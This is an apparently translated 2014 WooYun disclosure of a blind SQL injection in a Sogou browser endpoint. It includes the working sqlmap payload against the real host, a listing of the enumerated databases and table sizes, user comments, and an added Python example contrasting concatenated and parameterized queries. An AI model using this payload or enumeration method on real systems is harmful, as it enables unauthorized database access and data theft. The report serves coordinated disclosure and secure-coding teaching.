
Vulnerability summary

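Vulnerability ID: wooyun-2014-059168

Title: SQL injection in a Sogou application (leaks Nagios and other sensitive information)

Vendor: Sogou

Author: 超威蓝猫

Submitted: 2014-05-02 13:21

Fixed: 2014-06-16 13:22

Disclosed: 2014-06-16 13:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 19

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]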



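Vulnerability details

Disclosure status:

2014-05-02: Details sent to the vendor; awaiting vendor handling
2014-05-04: Vendor confirmed; details disclosed to the vendor only
2014-05-14: Details disclosed to core white hats and experts in related fields
2014-05-24: Details disclosed to regular white hats
2014-06-03: Details disclosed to intern white hats
2014-06-16: Details disclosed to the public

Brief description:

One database holds nearly 200 million MD5 values; no idea what they are..

Detailed description:

After installing the latest version of "Sogou High-Speed Browser" and opening it with Burp capturing traffic, the browser was seen making an HTTP request to the following address: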

http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB


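The md5 parameter is vulnerable to boolean-based blind injection.
Running --count turned up a nagios database, so further penetration should be possible. The p4p database holds nearly 200 million MD5 values; no idea what they are..

Proof of vulnerability: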

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: md5
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url=http://se.cdn.sogou.com/apk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742' AND 6498=6498 AND 'KOBd'='KOBd&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
---
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [10]:
[*] geoip
[*] information_schema
[*] ipmap
[*] mysql
[*] nagios
[*] p4p
[*] proxyservers
[*] pxpadmin
[*] server_status
[*] test
Database: geoip
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ip | 77947 |
| cc | 233 |
+---------------------------------------+---------+
Database: nagios
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| nagios_hostchecks | 209759 |
| nagios_timedevents | 55842 |
| nagios_servicechecks | 55703 |
| nagios_logentries | 4999 |
| nagios_systemcommands | 3623 |
| nagios_statehistory | 1248 |
| nagios_host_contacts | 732 |
| nagios_objects | 228 |
| nagios_contact_notificationcommands | 216 |
| nagios_timedeventqueue | 126 |
| nagios_hoststatus | 122 |
| nagios_service_contacts | 116 |
| nagios_configfilevariables | 97 |
| nagios_contactnotificationmethods | 56 |
| nagios_contactnotifications | 48 |
| nagios_services | 36 |
| nagios_servicestatus | 36 |
| nagios_commands | 29 |
| nagios_flappinghistory | 26 |
| nagios_timeperiod_timeranges | 24 |
| nagios_processevents | 22 |
| nagios_contacts | 18 |
| nagios_contactstatus | 18 |
| nagios_runtimevariables | 18 |
| nagios_contactgroup_members | 16 |
| nagios_commenthistory | 13 |
| nagios_contact_addresses | 8 |
| nagios_contactgroups | 8 |
| nagios_notifications | 8 |
| nagios_timeperiods | 4 |
| nagios_conninfo | 3 |
| nagios_configfiles | 1 |
| nagios_dbversion | 1 |
| nagios_instances | 1 |
| nagios_programstatus | 1 |
+---------------------------------------+---------+
Database: proxyservers
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy | 325 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 850 |
| help_topic | 484 |
| help_keyword | 404 |
| `user` | 74 |
| db | 37 |
| help_category | 36 |
| tables_priv | 23 |
| columns_priv | 6 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mysql_mon | 331986 |
| checksums | 19413 |
+---------------------------------------+---------+
Database: ipmap
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipmap | 189618 |
+---------------------------------------+---------+
Database: server_status
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mixer | 22386964 |
| mmsclient | 21797795 |
| castingflux | 6431398 |
| other | 591353 |
| tracker | 68015 |
| mixererror | 10073 |
| mmsclienterror | 10029 |
| castingerror | 2732 |
| othererror | 2724 |
| trackererror | 1322 |
| message | 566 |
+---------------------------------------+---------+
Database: pxpadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| server | 349 |
| castingserv | 327 |
| CS_cur | 324 |
| resource | 120 |
| channel | 116 |
| idc | 19 |
| contacts | 16 |
| platform | 16 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1239 |
| USER_PRIVILEGES | 451 |
| SCHEMA_PRIVILEGES | 438 |
| STATISTICS | 288 |
| KEY_COLUMN_USAGE | 269 |
| TABLE_PRIVILEGES | 231 |
| TABLE_CONSTRAINTS | 143 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 124 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 10 |
| COLUMN_PRIVILEGES | 6 |
+---------------------------------------+---------+
Database: p4p
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| md5 | 183041418 |
| software | 73765030 |
| uid_list | 53470743 |
| deadlink | 9237028 |
| user_holding | 6508087 |
| movie | 3658157 |
+---------------------------------------+---------+

Fix:

You're the professionals :)

Copyright notice: when reposting, please credit the source 超威蓝猫@WooYun
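
As an added example, not part of the original report and not Sogou's code: the md5 value from the sqlmap output above, run through a string-concatenated query and then through a bound, validated one. The `files` table, the function names and the use of Python with sqlite3 in place of the PHP/MySQL backend are assumptions.

```python
import re
import sqlite3

MD5_RE = re.compile(r"[0-9A-Fa-f]{32}")
GOOD = "F918BF5773F2FC1569CC1974C1DF5742"          # md5 value from the request in the report
PROBE = GOOD + "' AND 6498=6498 AND 'KOBd'='KOBd"  # md5 value from the sqlmap output above

def make_db():
    """Constructed stand-in table; the real schema is not shown in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE files (hash TEXT PRIMARY KEY, size INTEGER)")
    db.execute("INSERT INTO files VALUES (?, ?)", (GOOD, 2188000))
    return db

def lookup_concat(db, md5):
    """Vulnerable pattern: the request value is spliced into the SQL text."""
    sql = "SELECT COUNT(*) FROM files WHERE hash = '" + md5 + "'"
    return db.execute(sql).fetchone()[0]

def lookup_bound(db, md5):
    """Bound parameter: the value is data and never reaches the SQL parser."""
    return db.execute("SELECT COUNT(*) FROM files WHERE hash = ?", (md5,)).fetchone()[0]

def lookup_hardened(db, md5):
    """Reject anything that is not exactly 32 hex characters, then bind."""
    if not MD5_RE.fullmatch(md5):
        raise ValueError("md5 must be exactly 32 hex characters")
    return lookup_bound(db, md5.upper())

if __name__ == "__main__":
    db = make_db()
    # With concatenation the quote ends the string and the rest becomes SQL,
    # so the row still matches although the value is not a hash.
    print("concat, clean value :", lookup_concat(db, GOOD))
    print("concat, probe value :", lookup_concat(db, PROBE))
    # With binding the whole value is compared as a literal and matches nothing.
    print("bound,  probe value :", lookup_bound(db, PROBE))
    try:
        lookup_hardened(db, PROBE)
    except ValueError as exc:
        print("hardened, probe     :", exc)
```
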


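Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-05-04 16:45

Vendor reply:

Thanks for your support!
You are welcome to submit Sogou vulnerabilities to SGSRC, address: http://

Latest status:

None


Vulnerability evaluation:

Comments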

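  1. 2014-05-02 15:58 | 浅兮 ( intern white hat | Rank:70 Vulnerabilities:30 )

    Uh, I see this all the time, no idea what it is!

  2. 2014-05-04 16:52 | 乐乐、 ( regular white hat | Rank:853 Vulnerabilities:189 )

    Looks like the vendor didn't finish their sentence~

  3. 2014-05-04 19:41 | 超威蓝猫 ( core white hat | Rank:1092 Vulnerabilities:117 | STEAM_0:0:55968383)

    @乐乐、 WooYun filters links

  4. 2014-05-27 17:08 | 李旭敏 ( regular white hat | Rank:469 Vulnerabilities:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    @乐乐、 It got blocked··

  5. 2014-06-16 16:59 | 小学猹 ( intern white hat | Rank:81 Vulnerabilities:30 | In late spring, when the spring clothes are ready, with five or six young men and six or seven boys...)

    If it were me I'd have dumped it; it's always uploading strange things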